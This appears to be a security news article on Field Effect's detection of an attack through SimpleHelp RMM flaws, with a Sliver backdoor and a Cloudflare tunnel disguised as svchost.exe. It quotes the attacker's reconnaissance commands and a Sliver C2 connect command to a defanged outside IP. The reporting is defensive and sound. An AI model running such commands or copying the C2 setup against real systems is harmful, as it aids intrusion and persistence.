Cybersecurity firm Field Effect has identified and thwarted a sophisticated cyberattack that leveraged newly discovered vulnerabilities in SimpleHelp’s Remote Monitoring and Management (RMM) software. Threat actors exploited these flaws to infiltrate target networks, establish persistent access, and deploy the Sliver backdoor, a post-exploitation framework frequently used for red teaming but increasingly abused by cybercriminals.
According to Field Effect, “the attack involved the quick and deliberate execution of several post-compromise tactics, techniques and procedures (TTPs) including network and system discovery, administrator account creation, and the establishment of persistence mechanisms, which could have led to the deployment of ransomware had Field Effect MDR not prevented the attack.”
The attack commenced when a threat actor gained entry via a compromised SimpleHelp RMM client known as JWrapper-Remote Access. The malicious connection originated from IP address 194.76.227[.]171, located in Estonia, which was hosting a SimpleHelp server on port 80, as identified through Shodan scans. However, due to minimal detection rates across security vendors, this connection likely evaded standard network security filters.
Upon gaining access, the adversary executed a series of reconnaissance commands to enumerate system information, user accounts, and network structures. The following commands were observed:
- ipconfig /all (Network configuration details)
- net group “domain admins” /domain (Listing domain administrators)
- nltest /dclist: (Enumerating domain controllers)
- tasklist (Listing running processes)
- net share and net use (Enumerating shared network resources)
After reconnaissance, the attackers escalated privileges by creating a new administrator account, dubbed “sqladmin.” They then installed a malicious agent.exe binary to serve as a persistence mechanism, in case RMM access was lost.
Field Effect’s analysis of agent.exe revealed that it was consistent with the Sliver post-exploitation framework, an advanced Go-based C2 (command-and-control) tool comparable to Cobalt Strike and Metasploit. The binary exhibited process injection, service tampering, and file system manipulation capabilities—all hallmarks of Sliver-based intrusions.
“The backdoor was configured to connect to the IP address 45.9.148[.]136 on port 443 via the following command: agent.exe -connect 45.9.148[.]136:443 -ignore-cert,” Field Effect reported.
This C2 infrastructure, hosted in the Netherlands, was found to be running OpenSSH, AnyDesk, and additional remote access services, making it a robust launching pad for further malicious activities.
Once inside the environment, the attackers targeted the domain controller (DC) and re-established RMM access to execute the same set of reconnaissance commands. However, instead of deploying agent.exe, they opted for a Cloudflare tunnel masquerading as Windows svchost.exe, effectively bypassing firewall restrictions and concealing traffic from security tools.
According to Field Effect, “attempted tunnel execution was blocked by the Field Effect MDR endpoint agent, following which the system was also isolated from the network.” Had the activity gone undetected, this tunnel could have facilitated further malware deployment, potentially leading to ransomware attacks.
While no definitive attribution has been made, Field Effect noted that similar tactics were previously observed in campaigns linked to the Akira Ransomware group. However, given the common TTPs, multiple threat actors could be leveraging SimpleHelp vulnerabilities for their own objectives.
Field Effect also confirmed that an earlier January 28 attack, initially suspected to be SimpleHelp-related, was indeed caused by the same RMM exploitation vector. Analysis of the SimpleHelp server configuration revealed that it had been modified to accept connections from a malicious SimpleHelp instance hosted on a Russian IP (213.183.45[.]230).
Related Posts:
- SimpleHelp Urgents to Patch Critical Security Vulnerabilities
- DLL Sideloading & Proxying: New Campaign Delivers Sliver Implants to German Targets
- MuddyWater’s Sneaky New Tactic: Hijacking RMM Software for Espionage
- X (formerly Twitter) to Use User Data for AI Development, No Compensation Offered
